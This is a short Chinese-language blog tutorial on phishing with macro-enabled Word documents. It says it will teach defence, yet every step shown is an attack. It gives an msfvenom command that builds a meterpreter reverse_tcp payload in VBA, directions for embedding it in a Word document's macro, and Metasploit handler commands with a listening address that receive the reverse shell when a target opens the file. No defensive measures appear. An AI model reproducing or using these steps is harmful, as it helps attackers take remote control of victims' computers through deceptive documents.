网络钓鱼是我们日常最为常见的一种攻击手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的word excel ppt等文档。从而获取系统权限,本期教程来说说如何防御这种攻击!

emali

首先我们利用msf生成vbs

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba

生成恶意shell

设置word

新建一个word文档,文件另存为启用宏的word文档
启用宏的word文档
然后开发工具——visual Basic
选择我们的项目ThisDocument双击打开,粘贴我们生成的shell。

保存完成后,配置msf。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555

当目标运行word文档后,在msf中便会得到反弹!

Last modification:April 23rd, 2020 at 01:50 pm
正在沿街乞讨中……